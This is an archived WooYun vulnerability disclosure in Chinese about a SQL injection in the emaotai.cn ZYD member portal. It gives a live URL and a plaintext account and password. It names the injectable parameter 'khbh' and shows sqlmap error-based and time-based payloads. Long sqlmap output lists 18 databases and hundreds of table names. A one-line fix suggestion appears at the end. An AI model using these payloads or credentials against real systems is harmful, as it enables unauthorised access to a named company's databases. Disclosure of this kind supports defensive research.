乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-12: 细节已通知厂商并且等待厂商处理中 2015-11-25: 厂商已经主动忽略漏洞,细节向公众公开
http://www.emaotai.cn:90/zyd/
账号:wanglei密码:123456
注入点
www.emaotai.cn:90/zyd/Member/JlrList.aspx?khbh=20130523000007
Payload: khbh=20130523000007' AND 4064=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4064=4064) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(122)+CHAR(113))) AND 'sQAa'='sQAa Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: khbh=20130523000007';WAITFOR DELAY '0:0:5'-----[23:14:40] [INFO] testing Microsoft SQL Server[23:14:40] [INFO] confirming Microsoft SQL Server[23:14:41] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET 4.0.30319, ASP.NETback-end DBMS: Microsoft SQL Server 2008[23:14:41] [INFO] fetching database names[23:14:42] [INFO] the SQL query used returns 18 entries[23:14:42] [INFO] retrieved: distribution[23:14:42] [INFO] retrieved: DrpEco[23:14:43] [INFO] retrieved: drpecosdl[23:14:43] [INFO] retrieved: DrpEcoTest[23:14:43] [INFO] retrieved: eAct[23:14:44] [INFO] retrieved: eActTest[23:14:44] [INFO] retrieved: emaotai_act[23:14:44] [INFO] retrieved: emaotai_act_test[23:14:45] [INFO] retrieved: emaotai_logs[23:14:45] [INFO] retrieved: hishop[23:14:45] [INFO] retrieved: master[23:14:46] [INFO] retrieved: model[23:14:46] [INFO] retrieved: moutai[23:14:46] [INFO] retrieved: moutaitest[23:14:47] [INFO] retrieved: msdb[23:14:47] [INFO] retrieved: ReportServer[23:14:47] [INFO] retrieved: ReportServerTempDB[23:14:48] [INFO] retrieved: tempdbavailable databases [18]:[*] distribution[*] DrpEco[*] drpecosdl[*] DrpEcoTest[*] eAct[*] eActTest[*] emaotai_act[*] emaotai_act_test[*] emaotai_logs[*] hishop[*] master[*] model[*] moutai[*] moutaitest[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb
Payload: khbh=20130523000007' AND 4064=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (4064=4064) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(122)+CHAR(113))) AND 'sQAa'='sQAa Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: khbh=20130523000007';WAITFOR DELAY '0:0:5'-----web server operating system: Windowsweb application technology: ASP.NET 4.0.30319, ASP.NETback-end DBMS: Microsoft SQL Server 2008Database: moutai[573 tables]+--------------------------------+| Mail_Book || Mail_BookMark || Mail_Paper_Article || Mail_Paper_Articleimage || Mail_Paper_ImageNews || Mail_Paper_ImageNews_Style || Mail_Paper_article_Class || Mail_Paper_article_style || Mail_Paper_class || Mail_Paper_style || Mail_Papers || Mail_accessory || Mail_logs || Office_template || Paper_Article || Paper_ImageNews || Paper_ImageNews_Style || Paper_article_Class || Paper_class || Paper_style || Papers || RFID_CK || RFID_CKD || RFID_KH || RFID_SPML || RFID_ZKD || SolarData || T_ckgl_gyxshz || VIEW1 || VIEW2 || VIEW2_cnsk || VIEW_cnsk || V_ckgl_dbdzzrk || V_fpmx_dr || V_fpt_dr || V_gyfpmx_dr || V_hydbd || V_hyfp || V_kpdmc || V_testfp || V_testfpmx || V_xsgl_htzxqk || V_xsgl_hz || V_xsgl_hz1 || V_xsgl_khhz || V_xsgl_khhz1 || V_xsgl_wdhz || V_xsgl_wdhz1 || V_xsgl_xskhhz || V_xsgl_xskphz || V_xsgl_xswdhz || V_xsxtkhhz || V_xsxtwdhz || V_xsxtwdyj || Vv_gyfpmx || Vvv_fpmxdr || Vvv_fptdr || Vvv_gyfpmxdr || atest || bak_2010_wsh || bak_2010_ysh || bak_khgl_khxx || dtproperties || favorite_url || fpck_20040513 || lsht || lshtghmx || lshtthsjsl || lskhxx || lst_htgl_fpkpqk || lst_htgl_fpkpqk_yf || lst_htgl_htthjh || lst_htgl_htzl || lst_htgl_htzl_yf || lst_htgl_htzxqk || lst_htgl_khdg || lst_jhgl_wdjhzx || lst_khgl_ghqkbd || lst_khgl_sfkhsl || lst_khgl_wdkhsl || lst_xsgl_bzfx || lst_xsgl_dqrgm || lst_xsgl_dqygm || lst_xsgl_fpkpsp || lst_xsgl_htsp || lst_xsgl_htzx || lst_xsgl_khgmdb || lst_xsgl_khrgm || lst_xsgl_khygm || lst_xsgl_nzsb || lst_xsgl_qypzdb || lst_xsgl_qyxs || lst_xsgl_spytj || lst_xsgl_spytj_nz || lst_xsgl_spzltj || lst_xsgl_wdrgm || lst_xsgl_wdygm || lst_xsgl_xsnzs || lst_xsgl_xsqktj || lst_xsgl_yf || lst_xsgl_zlrzs || lst_xsgl_zlyzs || lst_xsgl_zsb || lst_yxwd_pq || lst_yxwdgl_wdjhzx || lst_yxwdgl_wdxsjhzx || map_kh || material_Paper_Article || material_Paper_Articleimage || material_Paper_ImageNews || material_Paper_ImageNews_Style || material_Paper_article_Class || material_Paper_article_style || material_Paper_class || material_Paper_style || material_Papers || order1 || order2 || paper_Articleimage || paper_article_style || pz200409 || pz_tmp || pz_tmp1 || r3dm0v3_sql || sysdiagrams || t_Sys_tip || t_b2b_icbc_pament || t_b2b_pament_config || t_b2b_tzcs || t_b2b_yjb || t_bak_htgl_htthjh || t_bak_htgl_htthjh_无合同 || t_bak_htgl_htthjht || t_ckgl_byd || t_ckgl_bygda || t_ckgl_ckbgy || t_ckgl_ckdm || t_ckgl_ckdm_tree || t_ckgl_ckkchz || t_ckgl_ckkcxthz || t_ckgl_ckspml || t_ckgl_cktz || t_ckgl_ckxtqh || t_ckgl_kcsl || t_ckgl_kctz || t_ckgl_kctz001 || t_ckgl_kctz_20050303 || t_ckgl_kctz_bak_gx_20070129 || t_ckgl_kctz_gf || t_ckgl_kctz_发票已审台帐未审完 || t_ckgl_lld || t_ckgl_lld_201312 || t_ckgl_lldmx || t_ckgl_lldmx_201312 || t_ckgl_ls_xsfp || t_ckgl_ndzz || t_ckgl_sld || t_ckgl_sldmx || t_ckgl_spck || t_ckgl_spck_20050308 || t_ckgl_spdb || t_ckgl_spdbmx || t_ckgl_sprk || t_ckgl_sprk_20060308 || t_ckgl_tzml || t_ckgl_wdyjh || t_ckgl_zzck || t_ckgl_zzkc || t_ckgl_zzrk || t_crm_bzwt || t_crm_fwrq || t_crm_lddj || t_crm_lpb || t_crm_lpbz || t_crm_lpbzmxb || t_crm_lpmxb || t_crm_selected || t_crm_sljtzd || t_crm_sljtzdmx || t_cwgl_cxf_bsb || t_cwgl_cxf_bsmxb || t_cwgl_grwlz || t_cwgl_jlsh || t_cwgl_jlsh_bak1 || t_cwgl_jlsh_bak2 || t_cwgl_mask || t_cwgl_pjsh || t_cwgl_wlz || t_cwgl_xjsk || t_cwgl_xsfpsk || t_cwgl_xsfpzz || t_cwgl_xspz || t_cwgl_zrz || t_cwgl_zzsh || t_cx_Rpt || t_cx_Rpt_bak || t_cx_sql || t_cxgl_cxfa || t_cxgl_cxfamxb || t_cxgl_cxfamxb_lsjl || t_cxgl_cxjh || t_cxgl_fybl || t_cxgl_hz || t_dzsw_notice || t_dzsw_notice_bak || t_dzsw_notice_class || t_dzsw_notice_image || t_dzsw_notice_style || t_dzsw_notice_ydjl || t_gy_ckgl_kctz || t_gy_ckkchz || t_gy_spck || t_gy_sprk || t_gy_xsfpmx || t_gy_xsfpt || t_gy_xskh || t_help_book || t_htgl_htlxbm || t_htgl_htthjh || t_htgl_htthjh_20060517 || t_htgl_htthjht || t_htgl_htwcqk || t_jgjk_cjdmlb || t_jgjk_cjdmxb || t_jgjk_hqqk || t_jgjk_jghqbt || t_jgjk_jghqmxb || t_jgjk_rwb || t_jgjk_spmlb || t_jhgl_cgjh || t_jhgl_cgjhmx || t_khgl_dkqk || t_khgl_gzhzb || t_khgl_khgl || t_khgl_khgz || t_khgl_khmp || t_khgl_khpj || t_khgl_khshfk || t_khgl_khspdz || t_khgl_khxx || t_khgl_khxxbi || t_khgl_khyx || t_khgl_kpwd || t_khgl_lskh || t_khgl_spml || t_khgl_sywj || t_pjgl_01 || t_pjgl_02 || t_pjgl_02_bak || t_pjgl_03 || t_pjgl_04 || t_pjgl_05 || t_pjgl_bmbm || t_pjgl_cfkh || t_pjgl_cfpq || t_pjgl_hzb01 || t_pjgl_hzbmx01 || t_pjgl_khdx || t_pjgl_khdx081030 || t_pjgl_pjxmb || t_post_info || t_prog_qg || t_psgl_clb || t_psgl_cysb || t_psgl_czdab || t_psgl_hyfymx || t_psgl_hyspmx || t_psgl_hyxx || t_psgl_jsb || t_psgl_jsbmxb || t_psgl_jsyb || t_psgl_lxr || t_psgl_yfjsb || t_psgl_yfjsb_shmx || t_psgl_yfjsbmx || t_psgl_ysfybz || t_rfid_map || t_scfx_fxjg || t_scfx_qyfw || t_scfx_schf || t_scfx_scys || t_scxx_dcjs || t_scxx_dcnr || t_scxx_dcry || t_scxx_document || t_scxx_nomtsp || t_scxx_sc || t_scxx_scdc || t_scxx_scdc_bak || t_scxx_scdcold || t_scxx_sctx || t_splc_signimg || t_splc_spjl || t_splc_splc || t_splc_spry || t_sys_Columdef || t_sys_Form || t_sys_FormGridParams || t_sys_FormStoredClass || t_sys_ServerClock || t_sys_StoreProc || t_sys_backup || t_sys_codelib || t_sys_download || t_sys_fielddef || t_sys_formlinks || t_sys_grid || t_sys_help || t_sys_help_chm || t_sys_images || t_sys_keycode || t_sys_logs || t_sys_menu || t_sys_menu_bak || t_sys_menu_permit || t_sys_menu_permit_bak || t_sys_menu_requests || t_sys_menuuser || t_sys_message || t_sys_msg || t_sys_newkey || t_sys_notice || t_sys_project || t_sys_queue || t_sys_requirement || t_sys_rpt || t_sys_rptjoin || t_sys_rtptables || t_sys_scene || t_sys_subject || t_sys_subject_relation || t_sys_suggestion || t_sys_tabledef || t_sys_ticket || t_sys_ticket_sub || t_sys_workflow || t_sys_works || t_test_odata || t_tot_yxwd_xsl || t_wldd_mrjh || t_wldd_psapb || t_wldd_psapmxb || t_wldd_sfd || t_wldd_sfdmx || t_wlgs_cljsb || t_wlgs_cljsmxb || t_xsgl_day || t_xsgl_ht || t_xsgl_htghmx || t_xsgl_htspdz || t_xsgl_htthsjsl || t_xsgl_htzxqk || t_xsgl_month || t_xsgl_nddyb || t_xsgl_scjhb || t_xsgl_scjhmx || t_xsgl_wdxshz || t_xsgl_wdyjhz || t_xsgl_xsfpmx || t_xsgl_xsfpt || t_xsgl_xsfpt_20070321 || t_xsgl_xsfpt_串库票_20070321 || t_xsgl_xsxthz || t_xsgl_zsgh || t_xsgl_zsghmx || t_xtgl_caryjs || t_xtgl_company || t_xtgl_config || t_xtgl_czjsb || t_xtgl_czjsb_bak || t_xtgl_czry || t_xtgl_czry_bak || t_xtgl_czry_pjflbm || t_xtgl_czryjs || t_xtgl_czryjs_bak || t_xtgl_czryqx || t_xtgl_dm || t_xtgl_jsgsb || t_xtgl_jsqx || t_xtgl_mailslot || t_xtgl_mailxx || t_xtgl_rjmkbmb || t_xtgl_rjmkbmb_bak || t_xtgl_spjg || t_xtgl_spml || t_xtgl_spsx || t_xtgl_tjlb || t_xtgl_tjsplb || t_xtgl_tjspml || t_xtgl_xsfqryb || t_xtgl_xtcs || t_xtgl_xzcs || t_xtgl_xzcs_071102 || t_xtgl_xzcs_bak || t_xtgl_xzdq || t_xtgl_xzqh || t_xtgl_xzqh20030922 || t_xtgl_xzqh_4 || t_xtgl_xzqh_bak || t_xtgl_xzqh_ds || t_xtgl_xzqh_err || t_xtgl_xzqh_sf || t_xtgl_xzqh_sx || t_xtgl_xzsf || t_ysjk_ysqkdjb || t_yxwdgl_gzb || t_yxwdgl_gzb2 || t_yxwdgl_gzb_20121013 || t_yxwdgl_gzb_ry || t_yxwdgl_gzbt || t_yxwdgl_gzbt_20121013 || t_yxwdgl_gzhzb || t_yxwdgl_gzjl || t_yxwdgl_gzry || t_yxwdgl_gzry2 || t_yxwdgl_gzry_20121013 || t_yxwdgl_wdjhmx || t_yxwdgl_wdpj || t_yxwdgl_wdxsjht || t_yxwdgl_xxfkb || t_yxwdgl_xxfkb_2013 || t_yxwdgl_yxrygz || t_yxwdgl_yxwd || t_yxwdgl_yxwd080423 || t_yxwdgl_yxwd2 || t_yxwdgl_yxwd3 || t_yxwdgl_yxwd_bak || t_yxwdgl_yxwdbd || t_yxwdgl_yxwdgxqyb || t_yxwdgl_yxwdtz || t_yxwdgl_yxwdxtqh || t_zmdgl_Maps || t_zmdgl_clffmxb || t_zmdgl_clml || t_zmdgl_ghjsb || t_zmdgl_ghjstjb || t_zmdgl_jckhb || t_zmdgl_jckhmx || t_zmdgl_jsqkb || t_zmdgl_khxmb || t_zmdgl_sqb || t_zmdgl_yjzmd || t_zmdgl_ysb || t_ztpzcs_extscript || t_ztpzcs_tablist || t_ztpzgl_pzcs || tmp1 || tmp_20041月出库2月收款部分 || tmp_2005年压单到2006年644笔 || tmp_bgy || tmp_cktz_zz || tmp_cwpz_2012 || tmp_gwl1 || tmp_gwl2 || tmp_kctz_20041227 || tmp_lskh || tmp_rfid_ckd || tmp_t_ckgl_spck_20050418 || tmp_wsh2010 || tmp_xsfp || tmp_xsfpt_bak_20070611 || tmp_xzcs_xh || tmp_xzsf || tmp_ycje || tmp_ycpz || tmp_ysh2010 || tmp_yxwd001 || tmp_zmd81 || v_b2b_order || v_b2b_order_detail || v_ckgl_allck || v_ckgl_ckdm || v_ckgl_dbd || v_ckgl_kctz_fp || v_ckgl_lld || v_ckgl_ncsz || v_ckgl_qcsz || v_ckgl_spml_InTz || v_ckgl_xszk || v_ckgl_yxck || v_ckgl_ztcxck || v_ckgl_zzdb || v_ckgl_zzk || v_crm_ldjl || v_crm_lxr || v_crm_lxrsr || v_cth_Test || v_customer_tax || v_cwgl_cxf_bsb || v_cwgl_xsfp_jlsh || v_cwgl_xsfpdata || v_cwgl_xsfpjjb || v_cwgl_xsfpsk || v_cwgl_xsfpzz || v_cxgl_cxfa || v_cxgl_cxfa_list || v_cxgl_cxjh || v_cxgl_cxjh_list || v_dgzn_wdlist || v_jgjk_jgavg || v_jgjk_jghqmxb || v_kcgl_xsfp || v_khgl_lxr || v_pos_rkd || v_pos_rkd_yun || v_pos_xsd || v_pos_xsd_yun || v_psgl_hyspmx || v_psgl_hyxx || v_psgl_jsyb || v_pzgl_xspz || v_rfid_ckd || v_rfid_map || v_rfid_perstore || v_rfid_totstore || v_splc_signimg || v_splc_spjl || v_splc_spjl_sign || v_splc_spry || v_t_scxx_dcnr || v_ticket_customer_tax || v_ticket_customer_tax_all || v_ticket_tax || v_ticket_tax_all || v_tot_yxwd_xsl || v_tot_yxwd_xsl_wan || v_wdjhzx || v_wdjhzx_js0 || v_wdjhzx_js0_wzx || v_wdjhzx_wzx || v_wdjhzxqk || v_wdjhzxqk_js0 || v_wdjhzxqk_js0_wzx || v_wdjhzxqk_wzx || v_wdyj_nz || v_wdyj_nz_js0 || v_wldd_psapb || v_wldd_sfdmx || v_xsgl_khrgm || v_xsgl_khygm || v_xsgl_lsfp || v_xsgl_order_xsfp || v_xsgl_scjh_kc || v_xsgl_spytj || v_xsgl_spytj_nsk || v_xsgl_spytj_sk || v_xsgl_wdrhz || v_xsgl_wdyhz || v_xsgl_xsfp || v_xsgl_xsfp2 || v_xsgl_xsfp_jjb || v_xsgl_xsfp_jlsh || v_xsgl_xsfp_jlsh2 || v_xsgl_xsfp_list || v_xsgl_xsgskpcx || v_xsgl_xskhrtj || v_xsgl_xsrtj || v_xsgl_xsytj || v_xsgl_xsytj_nz || v_xsgl_xsytj_nzs || v_xzqh || v_yxwdgl_xxfkb || v_yxwdgl_yjfklb || v_yxwl_dqdb || v_yxwl_dqzs || vv_gyfpt || xspz_200301 || 中枢专卖店调拨总量查询 || 仓库代码为空的发票 || 仓库代码为空的发票2 || 已审已出20060926 || 改动成本发票20030818 || 角色表 |+--------------------------------+
修改账号密码,过滤sql特殊字符
危害等级:无影响厂商忽略
忽略时间:2015-11-25 05:08
漏洞Rank:4 (WooYun评价)
暂无
